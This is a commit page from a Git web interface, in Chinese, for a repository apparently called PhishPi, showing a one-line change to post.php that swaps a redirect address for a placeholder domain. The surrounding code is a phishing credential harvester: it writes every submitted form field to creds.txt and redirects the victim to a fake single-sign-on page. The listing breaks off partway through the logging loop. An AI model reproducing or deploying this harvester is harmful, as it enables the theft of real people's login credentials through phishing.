瀏覽代碼

Update post.php

assume-breach 3 年之前
父節點
當前提交
5669785e88
共有 1 個文件被更改,包括 1 次插入1 次删除
  1. 1 1
      PhishPi/Resources/post.php

+ 1 - 1
PhishPi/Resources/post.php

@@ -1,5 +1,5 @@
 <?php
-header ('Location:http://10.1.1.1/sso.html');
+header ('Location:http://domain/sso.html');
 $handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);